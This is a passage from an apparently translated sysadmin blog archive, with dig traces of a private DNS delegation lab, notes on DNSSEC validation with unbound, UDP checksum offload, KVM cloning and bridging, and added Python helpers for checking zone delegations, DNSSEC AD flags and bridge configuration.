[root@hat4-vm ~]# dig @127.1 www.test.co.jp.
; <<>> DiG 9.7.1 <<>> @127.1 www.test.co.jp.
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42021
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;www.test.co.jp. IN A
;; ANSWER SECTION:
www.test.co.jp. 86400 IN A 10.0.0.1
;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.
Following the delegation from the root by hand ( dig +trace automates the same walk ):
[root@hat4-vm ~]# dig @192.168.1.50 www.test.co.jp +norec
; <<>> DiG 9.7.1 <<>> @192.168.1.50 www.test.co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29607
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;www.test.co.jp. IN A
;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51
[root@hat4-vm ~]# dig @192.168.1.51 www.test.co.jp +norec
; <<>> DiG 9.7.1 <<>> @192.168.1.51 www.test.co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48652
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;www.test.co.jp. IN A
;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.
;; ADDITIONAL SECTION:
ns.test.co.jp. 86400 IN A 192.168.1.52
[root@hat4-vm ~]# dig @192.168.1.52 www.test.co.jp +norec
; <<>> DiG 9.7.1 <<>> @192.168.1.52 www.test.co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65425
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;www.test.co.jp. IN A
;; ANSWER SECTION:
www.test.co.jp. 86400 IN A 10.0.0.1
;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.
;; ADDITIONAL SECTION:
ns.test.co.jp. 86400 IN A 192.168.1.52
Various other queries ( the answers match what dig @a.root-servers.net and dig @a.dns.jp return for the real zones, so the configuration seems fine )
[root@hat4-vm ~]# dig @192.168.1.50 . +norec
; <<>> DiG 9.7.1 <<>> @192.168.1.50 . +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59980
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;. IN A
;; AUTHORITY SECTION:
. 3600 IN SOA x.root-servers.net. hostmaster.root-servers.net. 2010062304 3600 900 2592000 3600
;; Query time: 1 msec
;; SERVER: 192.168.1.50#53(192.168.1.50)
;; WHEN: Tue Jun 29 00:26:29 2010
;; MSG SIZE rcvd: 81
[root@hat4-vm ~]#
[root@hat4-vm ~]# dig @192.168.1.50 jp. +norec
; <<>> DiG 9.7.1 <<>> @192.168.1.50 jp. +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38991
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;jp. IN A
;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51
;; Query time: 2 msec
;; SERVER: 192.168.1.50#53(192.168.1.50)
;; WHEN: Tue Jun 29 00:26:33 2010
;; MSG SIZE rcvd: 56
[root@hat4-vm ~]#
[root@hat4-vm ~]# dig @192.168.1.50 co.jp +norec
; <<>> DiG 9.7.1 <<>> @192.168.1.50 co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39887
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;co.jp. IN A
;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51
[root@hat4-vm ~]# dig @192.168.1.51 jp +norec
; <<>> DiG 9.7.1 <<>> @192.168.1.51 jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28399
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;jp. IN A
;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
;; Query time: 3 msec
;; SERVER: 192.168.1.51#53(192.168.1.51)
;; WHEN: Tue Jun 29 00:27:47 2010
;; MSG SIZE rcvd: 73
[root@hat4-vm ~]#
[root@hat4-vm ~]# dig @192.168.1.51 co.jp +norec
; <<>> DiG 9.7.1 <<>> @192.168.1.51 co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53030
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;co.jp. IN A
;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
[root@hat4-vm ~]# dig @192.168.1.51 jp ns +norec
; <<>> DiG 9.7.1 <<>> @192.168.1.51 jp ns +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 670
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; QUESTION SECTION:
;jp. IN NS
;; ANSWER SECTION:
jp. 86400 IN NS x.dns.jp.
;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51
;; Query time: 6 msec
;; SERVER: 192.168.1.51#53(192.168.1.51)
;; WHEN: Tue Jun 29 00:28:32 2010
;; MSG SIZE rcvd: 56
[root@hat4-vm ~]#
[root@hat4-vm ~]# dig @192.168.1.51 co.jp ns +norec
; <<>> DiG 9.7.1 <<>> @192.168.1.51 co.jp ns +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38325
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;co.jp. IN NS
;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
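The question at the top of this post ( is the configuration right? ) can be answered for the delegation structure without any DNS traffic. The check below is an added example, not part of the original post: it reads the three zone files above, constructed inline from the listings on this page with the multi-line SOA compacted, and verifies the chain statically: each delegation must be a direct child of the zone and must not lie below another cut ( the co.jp. NS line in the root zone is exactly such an occluded record ), every in-bailiwick NS target needs a glue A record, and the parent's NS set for a child must match the child's own apex NS set ( a mismatch is the classic lame-delegation bug that the manual dig walk above would also expose ). The parser is deliberately minimal and assumes absolute names, as all of these files use.

```python
# Added example (not from the original post): static check of the delegation chain
# in the three zone files of this lab. The zone texts are constructed sample input,
# copied from the page listings with the multi-line SOA compacted.
ROOT_ZONE = """\
$TTL 86400
. IN SOA x.root-servers.net. hostmaster.root-servers.net. (
    2010062304 1h 15m 30d 1h )
    IN NS x.root-servers.net.
x.root-servers.net. IN A 192.168.1.50
jp. IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51
co.jp. IN NS x.dns.jp.
"""
JP_ZONE = """\
$TTL 86400
jp. IN SOA x.dns.jp. hostmaster.dns.jp. (
    2010062303 1h 15m 30d 1h )
    IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51
test.co.jp. NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52
"""
TEST_ZONE = """\
$TTL 86400
test.co.jp. IN SOA ns.test.co.jp. hostmaster.test.co.jp. (
    2010062303 1h 15m 30d 1h )
    IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52
www.test.co.jp. IN A 10.0.0.1
"""
ZONES = {".": ROOT_ZONE, "jp.": JP_ZONE, "test.co.jp.": TEST_ZONE}
# The same files with the occluded co.jp. line removed from the root zone.
ZONES_FIXED = dict(ZONES, **{".": ROOT_ZONE.replace("co.jp. IN NS x.dns.jp.\n", "")})


def parse_zone(origin: str, text: str) -> list:
    """Minimal zone-file reader returning (owner, type, first rdata field) triples.
    Handles $-directives, '@', a blank owner (repeat previous), an optional TTL and
    class, and a parenthesised multi-line SOA. Assumes absolute names."""
    records, owner, in_paren = [], origin, False
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].rstrip()
        if not line.strip() or line.startswith("$"):
            continue
        if in_paren:                      # inside the SOA parentheses: skip until ')'
            in_paren = ")" not in line
            continue
        in_paren = "(" in line and ")" not in line
        toks = line.split()
        if not raw[0].isspace():          # a new owner name; otherwise reuse the last one
            owner = origin if toks[0] == "@" else toks[0]
            toks.pop(0)
        if toks and toks[0].isdigit():    # optional TTL
            toks.pop(0)
        if toks and toks[0].upper() == "IN":
            toks.pop(0)
        if len(toks) >= 2:
            records.append((owner.lower(), toks[0].upper(), toks[1].lower()))
    return records


def is_below(name: str, zone: str) -> bool:
    """True if name is strictly inside zone (both absolute, lowercase, trailing dot)."""
    if zone == ".":
        return name != "."
    return name != zone and name.endswith("." + zone)


def check_delegations(zones: dict) -> list:
    """zones maps origin -> zone text. Returns a list of findings (empty = consistent):
    every cut is a direct child of its zone and not below another cut (occluded),
    every in-bailiwick NS target has glue, and parent and child agree on the NS set."""
    findings, parsed = [], {o: parse_zone(o, t) for o, t in zones.items()}
    for origin, recs in parsed.items():
        glue = {owner for owner, rtype, _ in recs if rtype == "A"}
        cuts = {}
        for owner, rtype, target in recs:
            if rtype == "NS" and owner != origin:
                cuts.setdefault(owner, set()).add(target)
        for child, targets in cuts.items():
            if not is_below(child, origin):
                findings.append(f"{child} delegated in {origin} is not inside the zone")
            for other in cuts:
                if other != child and is_below(child, other):
                    findings.append(f"{child} delegated in {origin} is occluded by the cut at {other}")
            for target in targets:
                if is_below(target, child) and target not in glue:
                    findings.append(f"{child} delegated in {origin}: no glue A record for {target}")
            apex = {t for o, r, t in parsed.get(child, []) if r == "NS" and o == child}
            if child in parsed and apex != targets:
                findings.append(f"{child}: {origin} delegates to {sorted(targets)}, "
                                f"child apex NS is {sorted(apex)}")
    return findings


if __name__ == "__main__":
    for label, zones in (("as posted", ZONES), ("fixed", ZONES_FIXED)):
        print(label, "->", check_delegations(zones) or "delegations consistent")
```

Run against the files as posted it reports only the occluded co.jp. record; with that line removed it reports nothing, which is the same conclusion the dig walk reached.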
About the "UDP bad checksum" errors seen when capturing ( UDP checksum offload )
Recent NICs compute the checksum in hardware: the system ( OS ) hands the packet to the NIC and the checksum is filled in after that.
The errors are not counted anywhere ( see netstat -s below ).
The capture happens here:
system ( OS ) -----------------> NIC ---------->
              dummy checksum        real checksum
Because the capture is taken while the packet still carries the dummy checksum, a checksum error is shown.
If bad checksums appear on transmit but not on receive, it is almost always this and not a NIC problem,
because received packets are captured after the checksum has already been verified.
In that case it can be ignored. ( ethtool -k eth0 shows whether tx checksum offload is on; ethtool -K eth0 tx off turns it off temporarily if a clean capture is needed. )
- transmit ( Bad checksum )
Source: 192.168.1.1 (192.168.1.1)
Destination: 128.63.2.53 (128.63.2.53)
User Datagram Protocol, Src Port: 33978 (33978), Dst Port: domain (53)
Source port: 33978 (33978)
Destination port: domain (53)
Length: 53
Checksum: 0x8975 [incorrect, should be 0x29bb (maybe caused by "UDP checksum offload"?)]
[Good Checksum: False]
[Bad Checksum: True]
- receive ( Good checksum )
Source: 192.5.5.241 (192.5.5.241)
Destination: 192.168.1.1 (192.168.1.1)
User Datagram Protocol, Src Port: domain (53), Dst Port: 38562 (38562)
Source port: domain (53)
Destination port: 38562 (38562)
Length: 837
Checksum: 0xceb4 [correct]
[Good Checksum: True]
[Bad Checksum: False]
The errors are not counted anywhere:
root@arizona:~# LANG=C netstat -s
Ip:
17708 total packets received
0 forwarded
0 incoming packets discarded
17454 incoming packets delivered
12100 requests sent out
Icmp:
9 ICMP messages received
0 input ICMP message failed.
ICMP input histogram:
destination unreachable: 9
9 ICMP messages sent
0 ICMP messages failed
ICMP output histogram:
destination unreachable: 9
IcmpMsg:
InType3: 9
OutType3: 9
Tcp:
23 active connections openings
3 passive connection openings
10 failed connection attempts
2 connection resets received
2 connections established
17115 segments received
11879 segments send out
0 segments retransmited
0 bad segments received.
165 resets sent
Udp:
226 packets received
9 packets to unknown port received.
0 packet receive errors
216 packets sent
UdpLite:
TcpExt:
10 TCP sockets finished time wait in fast timer
105 delayed acks sent
2 packets directly queued to recvmsg prequeue.
13717 packet headers predicted
1499 acknowledgments not containing data payload received
477 predicted acknowledgments
1 connections reset due to early user close
IpExt:
InMcastPkts: 52
OutMcastPkts: 37
InBcastPkts: 103
InOctets: 16864327
OutOctets: 10701647
InMcastOctets: 9908
OutMcastOctets: 7260
InBcastOctets: 12159
root@arizona:~#
Ubuntu Server : KVM , how to make a clone VM
root@arizona:~# cat /etc/lsb-release | grep -i desc
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"
Virtual Machine Manager -> right-click the source VM -> select Clone
Choose a name for the clone VM and click Clone
Creating...
Done!
Gparted : free partition resizing software
While looking for something like Partition Magic, I found gparted, which is free ( GPL ).
It can resize and create partitions of the following types:
ext2/ext3/ext4, FAT16/FAT32, hfs/hfs+, linux-swap, NTFS, reiserfs/4, ufs, xfs file systems
http://gparted.sourceforge.net/
The live CD boots into GNOME, and resizing is done from the GUI.
I actually tried it, and in my environment it resized correctly.
Unbound : End-to-End DNSSEC w/ Firefox
Firefox has a DNSSEC validation add-on, so I tried it.
- preparing unbound
Assumes the ITAR trust anchors are already set up
root@arizona:/etc/unbound# unbound -v
[1275843653] unbound[1701:0] notice: Start of unbound 1.4.1.
root@arizona:/etc/unbound# egrep "trust-anchor-file" unbound.conf | grep -v "#"
trust-anchor-file: "/etc/unbound/anchors.mf"
- check that DNSSEC queries validate
If the ad bit is set in the flags, it is OK
root@arizona:/etc/unbound# dig @127.1 www.isc.org +dnssec +multiline
; <<>> DiG 9.7.0-P1 <<>> @127.1 www.isc.org +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1402
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 5, ADDITIONAL: 9
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.isc.org. IN A
;; ANSWER SECTION:
www.isc.org. 240 IN A 149.20.64.42
www.isc.org. 240 IN RRSIG A 5 3 600 2010070523333
dig against an FQDN whose zone is not DNSSEC-signed does not set the ad bit
root@arizona:/etc/unbound# dig @127.1 www.google.com +dnssec +multiline
; <<>> DiG 9.7.0-P1 <<>> @127.1 www.google.com +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22658
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.google.com. IN A
It can also be checked with: unbound-host -C <config file> <FQDN> -v
root@arizona:/etc/unbound# unbound-host -C unbound.conf www.isc.org -v
[1275844036] libunbound[1821:0] notice: init module 0: validator
[1275844036] libunbound[1821:0] notice: init module 1: iterator
www.isc.org has address 149.20.64.42 (secure)
www.isc.org has IPv6 address 2001:4f8:0:2::d (secure)
www.isc.org has no mail handler record (secure)
root@arizona:/etc/unbound#
root@arizona:/etc/unbound# unbound-host -C unbound.conf www.google.com -v
[1275844044] libunbound[1860:0] notice: init module 0: validator
[1275844044] libunbound[1860:0] notice: init module 1: iterator
www.google.com is an alias for www.l.google.com. (insecure)
www.l.google.com has address 66.249.89.104 (insecure)
www.l.google.com has address 66.249.89.99 (insecure)
www.l.google.com has no IPv6 address (insecure)
www.l.google.com has no mail handler record (insecure)
- add the DNSSEC validation add-on to Firefox 3.6.3
download the add-on
https://addons.mozilla.org/en-US/firefox/addon/64247/
usage
http://www.dnssec-validator.cz/
In Firefox -> Tools -> Add-ons, set the IP of a DNSSEC-capable caching server ( unbound here )
Visit www.isc.org, which resolves with DNSSEC
An icon in the URL bar shows whether DNSSEC validation succeeded.
Red means the domain is DNSSEC-signed but the IP address has changed or the DNSSEC signature is broken, i.e. the answer is bogus; www.rhybar.cz is CZ.NIC's intentionally broken test domain:
root@arizona:~# unbound-host -C /etc/unbound/unbound.conf www.rhybar.cz -v
[1275845463] libunbound[4671:0] notice: init module 0: validator
[1275845463] libunbound[4671:0] notice: init module 1: iterator
www.rhybar.cz has address 217.31.205.50 (BOGUS (security failure))
validation failure : signature crypto failed from 194.0.13.1 for key rhybar.cz. while building chain of trust
www.rhybar.cz has IPv6 address 2001:1488:0:3::2 (BOGUS (security failure))
validation failure : signature crypto failed from 194.0.13.1 for key rhybar.cz. while building chain of trust
www.rhybar.cz has no mail handler record (BOGUS (security failure))
validation failure : signature crypto failed from 194.0.12.1 for key rhybar.cz. while building chain of trust
Capture on the caching server while Firefox resolves the name:
The query is sent with the DO bit enabled.
Questions: 1
Answer RRs: 0
Authority RRs: 0
Additional RRs: 1
Queries
www.rhybar.cz: type A, class IN
Name: www.rhybar.cz
Type: A (Host address)
Class: IN (0x0001)
Additional records
Name:
Type: OPT (EDNS0 option)
UDP payload size: 4096
Higher bits in extended RCODE: 0x0
EDNS0 version: 0
Z: 0x8000
Bit 0 (DO bit): 1 (Accepts DNSSEC security RRs)
Bits 1-15: 0x0 (reserved)
Data length: 0
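The capture above shows what a DNSSEC-aware client sends: an EDNS0 OPT record with UDP payload size 4096 and the DO bit ( Z = 0x8000 ). The code below is an added example for this page, not from the original post, from unbound or from the Firefox add-on: it builds that exact query, decodes the reply header, and maps it to the three states the unbound-host output above reports ( secure, insecure, bogus ) the way a client that does not set CD sees them: validated data carries AD, unsigned data does not, and bogus data is withheld as SERVFAIL. The same AD check is what the "flags: qr rd ra ad" test on the BIND caching server in the first post relies on. The three reply headers are constructed from the flags in the dig outputs on this page ( www.isc.org, www.google.com, www.rhybar.cz ); query() talks to a real resolver and is not needed for the offline part.

```python
import socket
import struct

# Header flag bits (RFC 1035, AD/CD from RFC 4035 s3.2)
QR, AA, TC, RD, RA, AD, CD = 0x8000, 0x0400, 0x0200, 0x0100, 0x0080, 0x0020, 0x0010
SERVFAIL = 2


def name_to_wire(name: str) -> bytes:
    """Wire form of a domain name: length-prefixed labels ending in the root label."""
    labels = [lbl for lbl in name.rstrip(".").split(".") if lbl]
    return b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in labels) + b"\x00"


def build_do_query(qname: str, qtype: int = 1, msg_id: int = 0x1234, payload: int = 4096) -> bytes:
    """Query with RD set and an EDNS0 OPT RR carrying the DO bit, as in the capture above."""
    header = struct.pack("!HHHHHH", msg_id, RD, 1, 0, 0, 1)       # QDCOUNT 1, ARCOUNT 1 (the OPT RR)
    question = name_to_wire(qname) + struct.pack("!HH", qtype, 1)  # class IN
    # OPT RR: root owner name, TYPE 41, CLASS = UDP payload size,
    # TTL = extended RCODE (8) | version (8) | Z (16, DO is the top bit = 0x8000), RDLEN 0
    opt = b"\x00" + struct.pack("!HHIH", 41, payload, 0x00008000, 0)
    return header + question + opt


def parse_header(msg: bytes) -> dict:
    """Decode the 12-byte header; enough to read the AD bit and the RCODE."""
    msg_id, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    return {
        "id": msg_id, "qr": bool(flags & QR), "aa": bool(flags & AA), "tc": bool(flags & TC),
        "rd": bool(flags & RD), "ra": bool(flags & RA), "ad": bool(flags & AD), "cd": bool(flags & CD),
        "rcode": flags & 0x000F, "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
    }


def classify(hdr: dict) -> str:
    """How a validating resolver exposes the three DNSSEC states to a client that did
    not set CD: bogus data is withheld as SERVFAIL, validated data carries AD, and
    anything else is insecure (unsigned zone, or a resolver that does not validate)."""
    if hdr["rcode"] == SERVFAIL:
        return "bogus (or other server failure)"
    if hdr["ad"]:
        return "secure"
    return "insecure"


# Constructed 12-byte reply headers (no body), modelled on the dig outputs on this page.
SECURE_REPLY = bytes.fromhex("1234 81a0 0001 0002 0000 0001")    # flags: qr rd ra ad  (www.isc.org)
INSECURE_REPLY = bytes.fromhex("1234 8180 0001 0003 0000 0001")  # flags: qr rd ra     (www.google.com)
BOGUS_REPLY = bytes.fromhex("1234 8182 0001 0000 0000 0001")     # qr rd ra, SERVFAIL  (www.rhybar.cz)


def query(server: str, qname: str, timeout: float = 2.0) -> dict:
    """Send the DO query over UDP and return the parsed reply header (needs a live resolver)."""
    msg = build_do_query(qname)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(msg, (server, 53))
        reply, _ = s.recvfrom(4096)
    hdr = parse_header(reply)
    if hdr["id"] != parse_header(msg)["id"]:
        raise ValueError("reply ID does not match query ID")
    return hdr


if __name__ == "__main__":
    for label, raw in (("secure", SECURE_REPLY), ("insecure", INSECURE_REPLY), ("bogus", BOGUS_REPLY)):
        print(label, "->", classify(parse_header(raw)))
    # Against the unbound on this page: query("127.0.0.1", "www.isc.org")
```

AD only means something when the resolver being asked validates and the path to it is trusted ( here it is 127.0.0.1 ); against a non-validating resolver everything comes back as "insecure". Setting CD ( 0x0010 ) in the query flags makes the resolver hand over bogus data instead of SERVFAIL, which is what dig +cd does and how the unbound-host output above can still print the www.rhybar.cz addresses.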
Ubuntu: encode n' play MP3 w/ Rhythmbox
root@arizona:~# cat /etc/lsb-release | grep -i desc
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"
root@arizona:~# apt-get install ubuntu-restricted-extras
root@arizona:~# apt-get install lame
Start Applications -> Sound & Video -> Rhythmbox
"Install MP3 plugin" is shown; click it to install
Edit -> Preferences, and in the music player settings set the format to MP3
- creating MP3s
Click the CD icon and "Copy all tracks to library" to rip the CD to MP3.
Ubuntu server : KVM , how to create a network bridge
root@arizona:~# cat /etc/lsb-release | grep -i description
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"
root@arizona:~# apt-get install bridge-utils
root@arizona:~# uname -r
2.6.32-22-server
By default, KVM guests run behind NAT ( the libvirt "virtual network" )
NAT virtual network
Internet ---eth0 KVM host ---virbr0--- VMs
eth0: 192.168.1.0/24
virbr0 ( virtual network ) : 192.168.122.0/24 ( the VMs' network )
Change this to a bridge so that the VMs are on the same network as the KVM host.
Internet ---eth0 KVM host ---br0--- VMs
eth0: 192.168.1.0/24
br0 ( network bridge ) : 192.168.1.0/24
root@arizona:~# /etc/init.d/networking stop
Change the network configuration: create br0 and bridge it to eth0.
- before
root@arizona:~# egrep -v "^#" /etc/network/interfaces.org
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet static
address 192.168.1.150
netmask 255.255.255.0
gateway 192.168.1.254
root@arizona:~#
- after
root@arizona:~# egrep -v "^#" /etc/network/interfaces
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet manual
auto br0
iface br0 inet static
address 192.168.1.150
network 192.168.1.0
netmask 255.255.255.0
broadcast 192.168.1.255
gateway 192.168.1.254
bridge_ports eth0
bridge_stp off
bridge_fd 0
bridge_maxwait 0
root@arizona:~#
root@arizona:~# /etc/init.d/networking start
After changing the network configuration, /etc/init.d/networking restart somehow did not work.
Doing stop -> start seems to be the better way.
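The stanza layout above can be checked mechanically before restarting networking. The following Python is an added example, not from the original post: it parses an ifupdown-style /etc/network/interfaces text and flags the mistakes that most often leave a bridge half-working, namely a bridge_ports member that still carries its own address, a static bridge with no address, and more than one default gateway. The embedded AFTER text is the post's own configuration; the BROKEN variant is constructed for the check.

```python
"""Sanity-check the bridge stanzas in an /etc/network/interfaces file.

Added example, not from the original post. AFTER is the post's working
configuration; BROKEN is a constructed variant in which eth0 kept its
static address and gateway alongside br0.
"""
from typing import Dict, List

AFTER = """\
auto lo
iface lo inet loopback
auto eth0
iface eth0 inet manual
auto br0
iface br0 inet static
address 192.168.1.150
network 192.168.1.0
netmask 255.255.255.0
broadcast 192.168.1.255
gateway 192.168.1.254
bridge_ports eth0
bridge_stp off
bridge_fd 0
bridge_maxwait 0
"""

# Constructed mistake: eth0 was never switched to "manual".
BROKEN = AFTER.replace(
    "iface eth0 inet manual",
    "iface eth0 inet static\naddress 192.168.1.150\ngateway 192.168.1.254",
)


def parse_interfaces(text: str) -> Dict[str, dict]:
    """Return {ifname: {"method": str, "options": {key: [values]}}}."""
    stanzas: Dict[str, dict] = {}
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        if parts[0] == "iface":                  # iface <name> <family> <method>
            current = {"method": parts[3], "options": {}}
            stanzas[parts[1]] = current
        elif parts[0] in ("auto", "allow-hotplug", "mapping", "source"):
            current = None                       # these lines end an iface stanza
        elif current is not None:
            current["options"].setdefault(parts[0], []).append(" ".join(parts[1:]))
    return stanzas


def check_bridges(stanzas: Dict[str, dict]) -> List[str]:
    """Return a list of human-readable problems; an empty list means the file looks sane."""
    problems: List[str] = []
    gateways = [name for name, s in stanzas.items() if "gateway" in s["options"]]
    if len(gateways) > 1:
        problems.append("multiple default gateways: " + ", ".join(gateways))
    for name, s in stanzas.items():
        ports = s["options"].get("bridge_ports")
        if not ports:
            continue                             # not a bridge stanza
        if s["method"] == "static" and "address" not in s["options"]:
            problems.append(f"{name}: static bridge without an address")
        for port in ports[0].split():
            if port == "none":
                continue
            member = stanzas.get(port)
            if member is None:
                problems.append(f"{name}: bridge_ports member {port} has no iface stanza")
            elif member["method"] != "manual" or "address" in member["options"]:
                problems.append(f"{name}: member {port} should be 'inet manual' with no address")
    return problems


if __name__ == "__main__":
    for label, text in (("after", AFTER), ("broken", BROKEN)):
        print(label, check_bridges(parse_interfaces(text)) or "ok")
```

Run it against the live file with `check_bridges(parse_interfaces(open("/etc/network/interfaces").read()))`; an empty list is the state the post's "after" configuration is in.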
- before
root@arizona:~# LANG=C ifconfig
eth0 Link encap:Ethernet HWaddr 00:1d:60:77:a1:38
inet addr:192.168.1.150 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8028 errors:0 dropped:0 overruns:0 frame:0
TX packets:11773 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2756850 (2.7 MB) TX bytes:10669402 (10.6 MB)
Interrupt:26 Base address:0xc000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:40 errors:0 dropped:0 overruns:0 frame:0
TX packets:40 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2360 (2.3 KB) TX bytes:2360 (2.3 KB)
virbr0 Link encap:Ethernet HWaddr 3e:0d:65:a8:fe:e7
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
inet6 addr: fe80::3c0d:65ff:fea8:fee7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:28 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:4760 (4.7 KB)
- after
br0 has been created. br0 is bridged to eth0.
virbr0 is NAT
br0 is the bridge ( bridged to eth0 )
root@arizona:/etc/network# LANG=C ifconfig
br0 Link encap:Ethernet HWaddr 00:1d:60:77:a1:38
inet addr:192.168.1.150 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:45 errors:0 dropped:0 overruns:0 frame:0
TX packets:54 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4244 (4.2 KB) TX bytes:6589 (6.5 KB)
eth0 Link encap:Ethernet HWaddr 00:1d:60:77:a1:38
inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:484 errors:0 dropped:0 overruns:0 frame:0
TX packets:576 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:208113 (208.1 KB) TX bytes:98061 (98.0 KB)
Interrupt:26 Base address:0xc000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:56 errors:0 dropped:0 overruns:0 frame:0
TX packets:56 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:5121 (5.1 KB) TX bytes:5121 (5.1 KB)
virbr0 Link encap:Ethernet HWaddr 2a:3e:0f:f6:b2:02
